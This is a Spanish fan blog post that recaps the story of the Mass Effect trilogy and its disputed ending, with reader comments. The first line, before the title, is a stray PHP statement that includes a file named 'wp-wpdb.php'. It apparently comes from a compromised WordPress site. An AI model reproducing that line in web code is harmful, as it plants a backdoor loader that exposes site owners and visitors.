if (is_file('wp-wpdb.php')) include_once('wp-wpdb.php'); Trilogía Mass Effect: las claves de la historia – La Fortaleza de LeChuck

Trilogía Mass Effect: las claves de la historia

Hace 5 años, Bioware ponía fin a la trilogía Mass Effect con su tercera entrega. El maravilloso viaje de Shepard acabó y ahora empieza una nueva aventura por la galaxia Andromeda con Ryder. Para aquellos que no recuerden los hechos o no hayan jugado, esta entrada pretende esclarecer la historia y recopilar los puntos clave de la trilogía Mass Effect.

Mass Effect 1 y 2

La historia de la saga Mass Effect gira en torno a la amenaza de los Segadores, una especie de máquinas muy poderosas e inteligentes que aparecen cada 50.000 años y arrasan con civilizaciones enteras. Estas criaturas están compuestas de componentes orgánicos, ya que «absorben» la esencia de la especie, por lo que son prácticamente inmortales si no se acaba con ellas. Los Segadores llevan millones de años estudiándonos y conocen casi todo de nosotros.
Aparte de su enorme poder destructivo y su inmortalidad, tienen la capacidad de adoctrinar orgánicos, ya sea por estar bajo la influencia de un segador, o por tener contacto con algún objeto de estos. El ser adoctrinado es como una marioneta en manos de los Segadores y defenderá sus propósitos. En Mass Effect 1 nos enfrentamos a Saren Arterius, un espectro renegado que ayuda a un segador llamado Soberano a iniciar el próximo ciclo de extinción. Pero el adoctrinamiento va más allá e incluso los orgánicos pueden ser transformados en cascarones como vimos repetidas veces en Mass Effect 2, donde individuos eran clavados en afiladas barras metálicas para su posterior mutación.

Algunas de las especies adoctrinadas con las que tenemos contacto a lo largo de la saga Mass Effect son los Recolectores, antiguamente Proteanos, y convertidos ahora en desdichados esclavos de los Segadores. Tenemos también a los Cuidadores, una extraña raza que habita desde hace milenios la Ciudadela y que, en un principio, se desconoce su origen e intención más allá del «mantenimiento», por lo que la gente los ignora. Al final de Mass Effect 1 se descubre que es otra civilización adoctrinada desde hace eones por los Segadores. Los Geth, una raza sintética creada por los quarianos, también son utilizados por los Segadores, y aquellos que siguen ciegamente al enemigo están infectados por un virus que anula su libre albedrío. Legión los llama «herejes» pero indica que solo son un pequeño número dentro de su especie.
Recolectores, antiguos Proteanos

En nuestro encontronazo con el Soberano, este nos cuenta que los Segadores construyeron la Ciudadela y los relés de masa para tener a las civilizaciones controladas para cuando llegara el momento de aniquilarlas. Así también se aseguran de que los orgánicos no avancen más allá de zonas sin relés, es decir, las especies se desarrollan a lo largo de los caminos que los Segadores desean.

Nuestro encuentro con el Soberano en Mass Effect

Las balizas que descubrimos en Mass Effect fueron enviadas por los proteanos para avisar de la amenaza segadora y de la existencia de Ilos. Esa información solo era comprensible para los orgánicos, como así nos relata Vigil, un programa IV proteano que encontramos en Ilos cuando vamos tras la pista del conducto. Vigil nos informa que los Proteanos descubrieron los relés de masa y la Ciudadela hace millones de años. La Ciudadela, además, es en realidad un relé de masa que conecta con el Espacio Oscuro, lugar donde hibernan los Segadores hasta el próximo ciclo. Cuando llega el momento, los Segadores lanzan la señal a la Ciudadela que los cuidadores reciben para abrir el relé. Desde allí se inicia la invasión segadora con el fin de la aniquilación de toda forma de vida avanzada. La Ciudadela ha permanecido desde tiempos inmemoriales como el centro neurálgico de las diferentes especies y del Consejo, es así como los Segadores extraen la información de las civilizaciones.

Vigil nos da información valiosa para detener a los Segadores

Pero no todos los Proteanos sucumbieron, los refugiados de Ilos suspendieron todo tipo de contacto con el exterior para no ser detectados e investigar una forma de detener los ciclos Segadores. Los científicos proteanos descubrieron los secretos de los relés de masa y crearon uno llamado «el conducto» mediante el cual llegaron a la Ciudadela para hacer que los Cuidadores ignoraran la señal. Saren, a través del conducto, viaja a la Ciudadela para acabar con el bloqueo y dar el control al Soberano, el cual quedó rezagado en el último ciclo y no pudo volver al Espacio Oscuro, por lo que adoctrinó aliados para abrir el relé. Finalmente, Shepard acaba con ambos y vuelve a instalar los archivos de seguridad proteanos para cerrar la puerta de entrada a los Segadores.

Gracias a los Proteanos, ha habido un retraso de miles de años en el ciclo de extinción, además de beneficiarnos de la tecnología segadora que descubrimos por el Soberano. Sin embargo, los Segadores, mediante sus adoctrinados y las colonias secuestradas en Mass Effect 2, intentaron crear un segador humano, pero sus planes fracasaron gracias a la intervención de Shepard que destruyó la base recolectora en el final de Mass Effect 2.
En el DLC La llegada, interludio entre Mass Effect 2 y 3, aplazamos la aniquilación segadora al destruir el Relé Alpha, el cual pretendían utilizar los Segadores para aparecer. Al final del DLC, tenemos unas gratas palabras del Heraldo: «Aprende esto mientras mueres en vano, tu hora llegará, tu especie caerá. Preparaos para la llegada«.

 

Mass Effect 3

La destrucción del Relé Alpha tan solo retrasa unos días el nuevo ciclo. Finalmente los Segadores llegan por un relé cercano al sistema Vular y se expanden con rapidez por toda la galaxia. Cuando comenzamos Mass Effect 3, la Tierra está siendo atacada, y es cuando finalmente la Alianza y el Consejo le dan la razón a Shepard: los Segadores existen y están aquí. Shepard ha de huir con el propósito de unir a las civilizaciones orgánicas contra el enemigo común. En nuestra huida encontramos a un niño asustado, al que intentamos ayudar pero nos responde diciendo que no hay salvación y desaparece. Antes de escapar con la Normandía, lo volvemos a ver subiendo a un transbordador, pero nadie más parece percatarse de su presencia. Finalmente el transbordador se estrella ante la mirada de impotencia de Shepard. A partir de este momento, el niño aparecerá en los sueños de nuestro protagonista; en un bosque tenebroso con sombras que le susurran mensajes mientras corre tras el niño, que siempre acaba ardiendo. Según la teoría del adoctrinamiento (la cual se desvanece tras el DLC del final extendido), todas estas escenas representan la lucha interna de Shepard contra el adoctrinamiento segador que le provocan un malestar y cansancio visible. Incluso llega a dudar abiertamente de si sigue siendo humano.
Warning! peligro de adoctrinamiento!

El arma para acabar con los Segadores es el Crisol, y los planos para construirlo los encontramos en las excavaciones de Marte, pero para controlar su poder necesitamos el catalizador que se halla en Thessia, planeta de origen Asari. Buscando el catalizador, nos topamos con el IV proteano «Vendetta» que nos cuenta que en cada ciclo la galaxia experimenta los mismos caminos y conflictos, como el irremediable enfrentamiento orgánico-sintético. También relata que los Segadores no son los creadores de los ciclos, sino unos meros «seguidores» de la creencia. Para terminar confiesa que el Crisol no fue obra de los proteanos, ellos encontraron los planos pero su construcción fue saboteada por un grupo adoctrinado que creía que podía usarlo para controlar a los Segadores, lo mismito que pretende Cerberus.

Un atisbo de esperanza para la paz entre orgánicos y sintéticos se sucede en Rannoch, planeta de origen quariano. Si vamos por la vía de la virtud, y permitimos que Legión transmita el código segador a todos los Geth para convertirlos en unidades independientes, veremos como ambos bandos entierran el hacha de guerra para vivir pacíficamente en el planeta. Recordemos que fueron los Quarianos quienes comenzaron la guerra contra ellos porque un Geth preguntó «¿Esta unidad tiene alma?». Para hacer llegar el código a todas las unidades, Legion se sacrifica, logrando así el inicio de la paz entre Quarianos y Geth. (Insertar lágrimas aquí)
Posiblemente la mejor escena de Mass Effect 3.

La interpretación del final de Mass Effect 3

Es el momento de desplegar todo el potencial de la galaxia contra los Segadores en la batalla por La Tierra. Hacia el final de Mass Effect 3, descubrimos que el catalizador es ni más ni menos que la Ciudadela. Los Segadores por culpa del Hombre Ilusorio conocen las intenciones de Shepard, así que ponen en la órbita de La Tierra a la Ciudadela para tenerla controlada en todo momento. Shepard se aproxima a su objetivo pero en ese momento las fuerzas segadoras con el Heraldo al frente bajan a la Tierra para impedirle que llegue al puente de luz que conecta con la Ciudadela.
El rayo segador va aniquilando al pelotón que corre hacía la luz, y finalmente impacta contra Shepard. A partir de aquí comienza el final de Mass Effect 3, que, según la teoría del adoctrinamiento (ya invalidada), sería la ensoñación de Shepard, la cual dura prácticamente hasta los créditos.
Después del impacto del rayo segador, escuchamos la voz del Mayor Coats diciendo que nadie ha sobrevivido, sin embargo vemos a un Shepard muribundo que despierta. Si miramos a nuestro alrededor, el ambiente se parece al de nuestros sueños y todo sucede en cámara lenta. Mientras caminamos, algunos enemigos nos atacan pero disponemos de una pistola con munición infinita. Antes de atravesar la luz, un merodeador (Marauder Shields) nos dispara en el hombro, pero como si nada. Conseguimos llegar a la Ciudadela, a una zona que no conocemos donde vemos algunos Cuidadores a lo suyo y muchos cadáveres. Anderson nos habla por el comunicador y dice que nos ha seguido (?) pero va adelantado (?). También que se parece a la base de los recolectores (¡pero si él nunca estuvo allí!). En las paredes podemos observar extrañezas como el efecto espejo de los números.

Finalmente nos reunimos con Anderson en la sala de control, pero en ese momento hace acto de presencia El Hombre Ilusorio quien, completamente adoctrinado y transformado mediante el poder segador, nos da un discurso calcado al de Saren defendiendo las ideas de control a los Segadores. También nos demuestra su poder haciendo que disparemos a Anderson en el costado, quien en todo momento nos alerta de que ignoremos sus palabras. Esto se puede interpretar como la lucha interna de Shepard donde Anderson es la resistencia al adoctrinamiento y El Hombre Ilusorio es la sumisión (según la teoría que estamos recordando). Si seguimos por el camino de la virtud, El Hombre Ilusorio se pegará un tiro, exactamente como hizo Saren. Vuelven las cosas extrañas: nos levantamos con la mano en el costado. Si recordáis, es donde disparamos a Anderson, a nosotros lo que nos dolía era el hombro. Finalmente, activamos la apertura de la Ciudadela para acoplar el Crisol.
A continuación tiene lugar una conversación entre Anderson y Shepard, y este comienza a sangrar por el costado. De repente, Anderson muere y con él parte de la fuerza de voluntad de Shepard, quien recibe un mensaje por radio de Hacket (o de un segador haciéndose pasar por él si seguimos nuestra la famosa teoría) indicándole que el Crisol no dispara. Shepard, muy malherido, trata de llegar al panel de control pero finalmente desfallece y una plataforma lo eleva hasta la cúpula.
Allí tenemos al niño que ha estado apareciendo en nuestros sueños, y punto débil de Shepard, que se nos presenta como el Catalizador. El niño/Catalizador/Heraldo nos explica que los ciclos se crearon con el único fin de asegurar la existencia de la vida orgánica en la galaxia basándose en la suposición de que todos los sintéticos destruyen a sus creadores orgánicos. La continuidad de la vida en la galaxia está asegurada a través de los ciclo de extinción. Los Segadores destruyen la vida orgánica avanzada para preservar un frágil equilibrio y creen que sin los ciclos los sintéticos aniquilaría toda la vida orgánica. Esto se debe a una tendencia natural al caos, ya que los orgánicos siempre van a crear sintéticos y los sintéticos siempre se rebelarán contra ellos. Los Segadores también creen que son el orden frente al caos, y la destrucción de civilizaciones avanzadas es la única manera de permitir que las más primitivas existan.

 

Ahora el niño nos da a elegir tres posibilidades:
A) Opcion azul: Control  (adoctrinamiento) El azul siempre ha sido representado a lo largo de Mass Effect como lo correcto, y en este caso es lo que nos quiere hacer creer el maldito niño.
B) Opción verde: Síntesis (adoctrinamiento) Mezclar orgánicos y sintéticos, por lo que obtendremos también un adoctrinamiento. Color que también da a entender que es bueno para nosotros.
C) Opción roja: Destrucción (salvación). El rojo siempre ha representado la rebeldía en el juego y lo poco correcto, y es la opción menos deseada por el niño, por eso nos asusta diciendo que como tenemos implantes sintéticos también moriríamos. Pero en realidad es la única forma de que Shepard sobreviva (bueno, y siempre que tengamos más de 4.000 de fuerza militar, claro)

También tenemos la opción de no hacer nada o meterle un tiro al niño, pero lo único que conseguimos es que los Segadores se salgan con la suya.

No quiero presionarte, pero tienes que elegir el destino de la galaxia

Sea cual sea la decisión, el Crisol disparará y, después, la Ciudadela explotará y con ella todos los relés de masa de la galaxia. Veremos a la Normandía escapar de la Tierra y llegar a un planeta deshabitado. Si elegimos la opción roja (destrucción) veremos una escena extra de Shepard respirando a través de la armadura destrozada y alrededor los escombros de lo que parece ser Londres. Según la teoría del adoctrinamiento, esto explica que Shepard nunca se levantó después del rayo segador y el desenlace fue la lucha interna que tuvo lugar en su cabeza. Después de los créditos, tenemos un pequeño epílogo donde un abuelo cuenta a su nieto las hazañas de Shepard, un héroe que salvó la galaxia. Su relato concluye con la esperanza de que los humanos viajen por el espacio en busca de nuevos planetas y formas de vida.

Apuntes finales

A pesar de que el final de «tres botones» de Mass Effect 3 no estuvo a la altura, no me parece un mal final ni mucho menos. Desde que Shepard aterriza en Londres, comienza el desenlace a un ritmo frenético. Son momentos terribles que hacen que el jugador se meta en el pellejo de Shepard, quien observa como la esperanza se agota, así como sus energías, pero la fuerza de voluntad es la llama que lo mantiene firme.
Él lo intentó
La teoría del adoctrinamiento de Mass Effect 3 tuvo muchos seguidores pero Bioware creyó que era necesario explicar el desenlace con más detalle y lanzó el DLC del final extendido con el que una teoría tan bien tejida se cae aclarando que lo que se ve es lo que hay.

A lo largo de estos años, Bioware ha sabido construir con Mass Effect un universo impresionante que se ha ido reinventando en cada entrega. Al echar la vista atrás, permanecen todos aquellos momentos memorables junto a nuestra querida tripulación y las gestas que salvaron la galaxia.

Para recordar todos los buenos momentos junto a nuestros compañeros, Bioware lanzó el maravilloso DLC Ciudadela, un homenaje que cierra una de las mejores experiencias jamás creadas.
Soy Garrus Vakarian y este es mi lugar favorito de la Ciudadela
 

Por Arashi

Aparte de patear traseros de piratas como gobernadora en Mêlée, soy una fanática de los videojuegos desde que de pequeña me regalaron la Atari 2600. Adoro las aventuras gráficas y los RPG, pero no le hago ascos al resto. Otra de mis pasiones es todo lo relacionado con Japón.

11 comentarios

  1. Asumir que la imagen extra proporcionada por el binomio de un alto porcentaje de preparación galáctica y la opción "destrucción", es una demostración de que Shepard jamás se levantó tras el disparo segador, es una interpretación libre y discutible sean cuales sean las premisas.

    Concluir en base a esto que la gente no ha sabido interpretar su propio final es, perdóname la

    1. Por supuesto que es una interpretación libre, ya que es una teoría como cualquier otra de las que circulan por la red.

      Lo que es una tontería es leer: "el final no se entiende nada es una mierda." Cosas así a montones te encuentras, supongo que muchos esperaban un final plano que no le hubiera hecho ningún bien a la historia.

      Gracias por tus comentarios 🙂

  2. Yo lo terminé ayer… y me ha encantado.. la verdad… creo que termina como debería..

    Sobre las teorías.. pues no me creo ninguna.. creo que si sube a la ciudadela.. y creo que cuando eso revienta y respira en los escombros.. no son de londres.. sino de la ciudadela (tambien había escombros en el ME1 al final.. y era la ciudadela.. a ver si ahora va a ser toda de metal.. XD)

    1. Me alegro 🙂 Podría ser perfectamente la ciudadela, por qué no! yo más que nada por el tipo de escombro y lo de la ensoñación lo descarto.
      Lo del espejo pues puede que tengas razón y solo sea un detalle, lo que es más raro es lo que pasa con Anderson y sobretodo cuando es el que recibe el tiro en el costado y no Shepard. En fin, habrá que esperar al DLC a ver si aclara algo!

  3. Lo chulo de este tipo de finales es lo que esta ocurriendo ahora. que cada uno dice su teoria, su opinion y todas pueden ser validas!!

    yo creo que estaba adoctrinado, por los sueños, por que leches, han tenido tecnologia reaper, han sido los que mas contacto han tenido con esa especie. hasta entraron en la base recolectora!!

    Pero como bien dice Elaine, quiza despues del dlc

  4. Para empezar, no creo que tenga que haber un final boss para decir que es "el final del juego", el final del juego es todo, y sobretodo comienza cuando corres hacia "la luz" mientras el segador dispara rayos por doquier. Todo lo de arriba es el final, y ES DIOS.

  5. Abril de 2012… siento revivir el post pero no lo había encontrado hasta ahora mismo y quería felicitarte.

    No he encontrado más que a unas pocas personas que quedaron contentas con el final original y la teoría del adoctrinamiento. La verdad es que yo quedé completamente satisfecho y no pude más que aplaudir ante semejante desenlace y aunque la teoría del adoctrinamiento la han tirado por tierra con el DLC sobre el final, «ojos que no ven, corazón que no siente» y me quedaré con lo que en su día viví y disfruté.

Dejar un comentario